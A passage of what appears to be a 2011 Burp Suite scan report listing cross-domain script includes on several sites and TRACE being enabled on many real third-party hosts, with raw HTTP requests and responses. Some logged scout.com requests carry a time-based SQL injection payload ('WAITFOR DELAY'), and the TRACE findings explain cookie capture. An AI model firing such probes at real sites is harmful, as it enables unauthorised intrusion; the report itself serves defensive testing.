       <title>Sc
...[SNIP]...
</script>
       <script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
       <script type="text/javascript" src="http://images.video.msn.com/js/ch/channels.js"></script>
...[SNIP]...
25.66. http://www.scout.com/2/a.z  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /2/a.z

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2/a.z?cfg=%27;WAITFOR%20DELAY%20%270:0:25%27--&fromprefetch=1&p=26&s=143 HTTP/1.1
Host: www.scout.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=Jwu5zEjpq0Q-W60ACS9; __utmz=202704078.1303516031.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; RefId=0; BrandId=0; __utma=202704078.454375544.1303509265.1303516031.1303522301.3

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Fri, 06 May 2011 19:29:27 GMT
Content-Type: text/html; charset=utf-8
Expires: Fri, 06 May 2011 19:39:01 GMT
Server: Microsoft-IIS/6.0
Server: Sodo
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Vary: Accept-Encoding
Content-Length: 11983

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
</script>
       <script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
       <script type="text/javascript" src="http://images.video.msn.com/js/ch/channels.js"></script>
...[SNIP]...
25.67. http://www.scout.com/Legacy/a.z  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /Legacy/a.z

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Legacy/a.z HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1303516031.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; SessionBrandId=0; __utma=202704078.454375544.1303509265.1304728142.1304731683.5; __utmc=202704078; UnicaNIODID=Jwu5zEjpq0Q-W60ACS9; __utmb=202704078.2.9.1304732669570;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Fri, 06 May 2011 20:44:56 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb10
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
Cache-Control: public, s-maxage=600
Expires: Fri, 06 May 2011 20:54:56 GMT
Content-Type: text/html
Content-Length: 12238

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
</script>
       <script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
       <script type="text/javascript" src="http://images.video.msn.com/js/ch/channels.js"></script>
...[SNIP]...
25.68. http://www.scout.com/Netsparker892e409084b746c39d5b25ba070e12d8.z  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /Netsparker892e409084b746c39d5b25ba070e12d8.z

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Netsparker892e409084b746c39d5b25ba070e12d8.z HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.scout.com
Cookie: RefId=0; BrandId=0; SessionBrandId=0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Fri, 06 May 2011 19:57:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Server: Pike
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
Cache-Control: private
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
</script>
       <script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
       <script type="text/javascript" src="http://images.video.msn.com/js/ch/channels.js"></script>
...[SNIP]...
25.69. http://www.scout.com/a.z  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /a.z

Issue detail

The response dynamically includes the following scripts from other domains:

Request

POST /a.z?s=%27;WAITFOR%20DELAY%20%270:0:25%27--&p=9&c=2&cid=1037787&nid=4811607&fhn=1 HTTP/1.1
Referer: http://www.scout.com/a.z?s=143&p=9&c=2&cid=1037787&nid=4811607&fhn=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.scout.com
Cookie: RefId=0; BrandId=0; SessionBrandId=0
Accept-Encoding: gzip, deflate
Content-Length: 61

__VIEWSTATE=%2fwEPDwULLTEzNzQyNzE0MDlkZA%3d%3d&q=Search+Scout

Response

HTTP/1.1 404 Not Found
Date: Fri, 06 May 2011 19:58:01 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb3
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
Cache-Control: public, s-maxage=600
Expires: Fri, 06 May 2011 20:08:01 GMT
Content-Type: text/html
Content-Length: 12238

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
</script>
       <script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
       <script type="text/javascript" src="http://images.video.msn.com/js/ch/channels.js"></script>
...[SNIP]...
25.70. http://www.scout.com/search.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /search.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /search.aspx HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1303516031.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; SessionBrandId=0; __utma=202704078.454375544.1303509265.1304728142.1304731683.5; __utmc=202704078; UnicaNIODID=Jwu5zEjpq0Q-W60ACS9; __utmb=202704078.2.9.1304732669570;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 06 May 2011 20:44:57 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb10
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14458

<!-- Start frame cache output for cachekey = (s=143&p=9&c=999.header) --><!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<ht
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
25.71. http://www.secureworks.com/compliance/comp/pci.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.secureworks.com
Path:   /compliance/comp/pci.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /compliance/comp/pci.html?_kk=6713825b-9989-43cb-8a7b-5c5635138b40&_kt=6426467207&gclid=CMm21t3V1KgCFcPd4AodU3_CiA HTTP/1.1
Host: www.secureworks.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:23:03 GMT
Server: Apache
Vary: Accept-Encoding
Cache-Control: public, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69185


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
   <head>        
<!-- Set content headers-->
<meta http-equiv="ExpiresDefault
...[SNIP]...
</script>
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.js" ></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
25.72. http://www.socialfollow.com/blog/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.socialfollow.com
Path:   /blog/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /blog/ HTTP/1.1
Host: www.socialfollow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=131048717.1303137471.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=131048717.787483735.1303137471.1303137471.1304721456.2; __utmc=131048717; __utmb=131048717.3.10.1304721456

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:39:52 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://www.socialfollow.com/blog/xmlrpc.php
Set-Cookie: PHPSESSID=f9e5973c7ff9e78b9f821853443b2eb5; expires=Fri, 06 May 2011 19:39:55 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 96431


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head pro
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=SocialFollow"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=SocialFollow"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=SocialFollow"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=SocialFollow"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=SocialFollow"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=SocialFollow"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=SocialFollow"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=SocialFollow"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=SocialFollow"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=SocialFollow"></script>
...[SNIP]...
25.73. https://www.trpc401k.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.trpc401k.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.trpc401k.com
Connection: keep-alive
Referer: http://www.trpcweb.com/content/account-support
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:45:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=r0m1zyj0xiq1vqe0djlxyhea; path=/; HttpOnly
Set-Cookie: QTWEB=CSS=BLUE3-NS.css&LANGUAGE=; path=/; secure; HttpOnly
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 12169

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html>
<head>
<META http-equiv="Content-Type" content="text/html">
<meta http-equiv="Content-Type" content=
...[SNIP]...
</div><script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
26. TRACE method is enabled  previous  next
There are 33 instances of this issue:

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

26.1. http://797-pwy-691.mktoresp.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://797-pwy-691.mktoresp.com
Path:   /

Request

TRACE / HTTP/1.0
Host: 797-pwy-691.mktoresp.com
Cookie: 91844ec4f6df7c27

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:20:50 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: 797-pwy-691.mktoresp.com
Cookie: 91844ec4f6df7c27

26.2. http://ads.adonion.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adonion.com
Path:   /

Request

TRACE / HTTP/1.0
Host: ads.adonion.com
Cookie: f197c37c12b56df8

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:03:51 GMT
Server: Apache/2.2.17 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: ads.adonion.com
Cookie: f197c37c12b56df8

26.3. http://ads.allatsea.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.allatsea.net
Path:   /

Request

TRACE / HTTP/1.0
Host: ads.allatsea.net
Cookie: dbdba7bfa990f8b9

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:17:36 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: ads.allatsea.net
Cookie: dbdba7bfa990f8b9

26.4. http://ads.clicksor.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.clicksor.com
Path:   /

Request

TRACE / HTTP/1.0
Host: ads.clicksor.com
Cookie: fb49f7908d4e6033

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:04:05 GMT
Server: Apache/2.2.17 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: ads.clicksor.com
Cookie: fb49f7908d4e6033

26.5. http://allatsea.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://allatsea.net
Path:   /

Request

TRACE / HTTP/1.0
Host: allatsea.net
Cookie: 9171e00fbfc3e391

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:06:36 GMT
Server: Apache/2.0.52 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: allatsea.net
Cookie: 9171e00fbfc3e391

26.6. http://apps.sapha.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apps.sapha.com
Path:   /

Request

TRACE / HTTP/1.0
Host: apps.sapha.com
Cookie: 3ae77a6505549b8e

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:05:43 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: apps.sapha.com
Cookie: 3ae77a6505549b8e

26.7. http://bh.contextweb.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /

Request

TRACE / HTTP/1.0
Host: bh.contextweb.com
Cookie: 2f5dff6a96597da5

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
Content-Type: message/http
Content-Length: 130
Date: Fri, 06 May 2011 22:33:35 GMT
Connection: Keep-Alive

TRACE / HTTP/1.0
host: bh.contextweb.com
cookie: 2f5dff6a96597da5
connection: Keep-Alive
cw-userhostaddress: 173.193.214.243
26.8. http://d.xp1.ru4.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.xp1.ru4.com
Path:   /

Request

TRACE / HTTP/1.0
Host: d.xp1.ru4.com
Cookie: 534033fed8f0856d

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 06 May 2011 22:33:37 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: message/http
Connection: close

TRACE / HTTP/1.0
Host: d.xp1.ru4.com
Cookie: 534033fed8f0856d

26.9. http://dce.sapha.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dce.sapha.com
Path:   /

Request

TRACE / HTTP/1.0
Host: dce.sapha.com
Cookie: 35b48c08c996ea18

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:05:25 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: dce.sapha.com
Cookie: 35b48c08c996ea18

26.10. http://depot.activalive.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://depot.activalive.com
Path:   /

Request

TRACE / HTTP/1.0
Host: depot.activalive.com
Cookie: e06c08b3e6ef7192

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:18:17 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: depot.activalive.com
Cookie: e06c08b3e6ef7192

26.11. http://haymarketbusinesspublications.122.2o7.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://haymarketbusinesspublications.122.2o7.net
Path:   /

Request

TRACE / HTTP/1.0
Host: haymarketbusinesspublications.122.2o7.net
Cookie: 45eec115b3f1a948

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:50:02 GMT
Server: Omniture DC/2.0.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: haymarketbusinesspublications.122.2o7.net
Cookie: 45eec115b3f1a948
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243

26.12. http://lbmc.imonitor.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lbmc.imonitor.net
Path:   /

Request

TRACE / HTTP/1.0
Host: lbmc.imonitor.net
Cookie: bde617a37b66185d

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 07 May 2011 01:34:01 GMT
X-Powered-By: ASP.NET
Content-Type: message/http
Content-Length: 71

TRACE / HTTP/1.0
Host: lbmc.imonitor.net
Cookie: bde617a37b66185d

26.13. http://learn.bridgefront.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://learn.bridgefront.com
Path:   /

Request

TRACE / HTTP/1.0
Host: learn.bridgefront.com
Cookie: 7ca599fcc4989161

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:58:24 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: learn.bridgefront.com
Cookie: 7ca599fcc4989161

26.14. https://seal.networksolutions.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://seal.networksolutions.com
Path:   /

Request

TRACE / HTTP/1.0
Host: seal.networksolutions.com
Cookie: 89103993768adba3

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 07 May 2011 00:53:51 GMT
Content-type: message/http
Connection: close

TRACE / HTTP/1.0
Host: seal.networksolutions.com
Cookie: 89103993768adba3

26.15. http://secure-us.imrworldwide.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /

Request

TRACE / HTTP/1.0
Host: secure-us.imrworldwide.com
Cookie: 3a60e87522942ffd

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:50:40 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 3a60e87522942ffd
Host: secure-us.imrworldwide.com

26.16. http://serw.clicksor.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://serw.clicksor.com
Path:   /

Request

TRACE / HTTP/1.0
Host: serw.clicksor.com
Cookie: b2bc8df79a09

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 15:47:21 GMT
Server: Apache/2.2.17 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: serw.clicksor.com
Cookie: b2bc8df79a09

26.17. http://sniff.visistat.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sniff.visistat.com
Path:   /

Request

TRACE / HTTP/1.0
Host: sniff.visistat.com
Cookie: c3d2167c7e00301c

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 18:39:55 GMT
Server: Apache/2.2.4 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: sniff.visistat.com
Cookie: c3d2167c7e00301c

26.18. http://t3.trackalyzer.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://t3.trackalyzer.com
Path:   /

Request

TRACE / HTTP/1.0
Host: t3.trackalyzer.com
Cookie: 61707a485ee5b9d

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 07 May 2011 01:22:28 GMT
P3P: policyref="http://trackalyzer.com/w3c/p3p.xml", CP="NON DSP COR CURa OUR NOR"
Content-Type: message/http
Content-Length: 71

TRACE / HTTP/1.0
Host: t3.trackalyzer.com
Cookie: 61707a485ee5b9d

26.19. http://tags.bluekai.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /

Request

TRACE / HTTP/1.0
Host: tags.bluekai.com
Cookie: bb3aea7ecb1232a3

Response

HTTP/1.0 200 OK
Date: Fri, 06 May 2011 22:33:36 GMT
Content-Type: message/http
Connection: close

TRACE / HTTP/1.0
Host: tags.bluekai.com
Cookie: bb3aea7ecb1232a3
X-Forwarded-For: 173.193.214.243
Cache-Control: max-age=259200

26.20. http://tours.sapha.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tours.sapha.com
Path:   /

Request

TRACE / HTTP/1.0
Host: tours.sapha.com
Cookie: 90ec1d0dfcce1bcd

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:05:27 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: tours.sapha.com
Cookie: 90ec1d0dfcce1bcd

26.21. http://track.websiteceo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://track.websiteceo.com
Path:   /

Request

TRACE / HTTP/1.0
Host: track.websiteceo.com
Cookie: 9b2845e100219d1

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:32:23 GMT
Server: Apache/1.3.39 (Unix) mod_perl/1.30
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 9b2845e100219d1
Host: track.websiteceo.com

26.22. http://widgets.digg.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /

Request

TRACE / HTTP/1.0
Host: widgets.digg.com
Cookie: 1fadf2d0edb58a28

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 20:08:41 GMT
Server: Apache
Content-Type: message/http
Accept-Ranges: bytes
X-CDN: Cotendo
Connection: close

TRACE / HTTP/1.1
Cookie: 1fadf2d0edb58a28
Accept-Encoding: gzip
Connection: Keep-Alive
Host: w.digg.com
x-cdn: Requested by Cotendo
X-Forwarded-For: 173.193.214.243, 208.93.140.14
x-chpd-loop: 1
Via: 1.0 PXY003-ASHB.COTENDO.NET (chpd/3
...[SNIP]...
26.23. http://www.angege.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.angege.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.angege.com
Cookie: d85dc5d484b2fa80

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 15:46:01 GMT
Server: Apache/2.2.11 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.angege.com
Cookie: d85dc5d484b2fa80

26.24. http://www.brownrudnick.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.brownrudnick.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.brownrudnick.com
Cookie: ab4df2edba88c488

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 06 May 2011 18:46:49 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Content-Type: message/http
Content-Length: 74

TRACE / HTTP/1.0
Host: www.brownrudnick.com
Cookie: ab4df2edba88c488

26.25. http://www.caribbean-ocean.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.caribbean-ocean.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.caribbean-ocean.com
Cookie: acfa5e63a2fc488f

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 15:59:32 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.caribbean-ocean.com
Cookie: acfa5e63a2fc488f

26.26. http://www.compliancepoint.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.compliancepoint.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.compliancepoint.com
Cookie: db91ca47b9c21801

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 07 May 2011 01:22:20 GMT
X-Powered-By: ASP.NET
Content-Type: message/http
Content-Length: 77

TRACE / HTTP/1.0
Host: www.compliancepoint.com
Cookie: db91ca47b9c21801

26.27. http://www.dynamicperimeter.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dynamicperimeter.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.dynamicperimeter.com
Cookie: 5a9da922a685dca9

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:20:51 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.dynamicperimeter.com
Cookie: 5a9da922a685dca9

26.28. http://www.lbmctech.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lbmctech.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.lbmctech.com
Cookie: 9a844b7f892cd881

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:27:46 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.lbmctech.com
Cookie: 9a844b7f892cd881

26.29. http://www.myroitracking.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myroitracking.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.myroitracking.com
Cookie: a9362d110aafab4

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 15:47:15 GMT
Server: Apache/2.2.17 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.myroitracking.com
Cookie: a9362d110aafab4

26.30. http://www.nextadvisor.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.nextadvisor.com
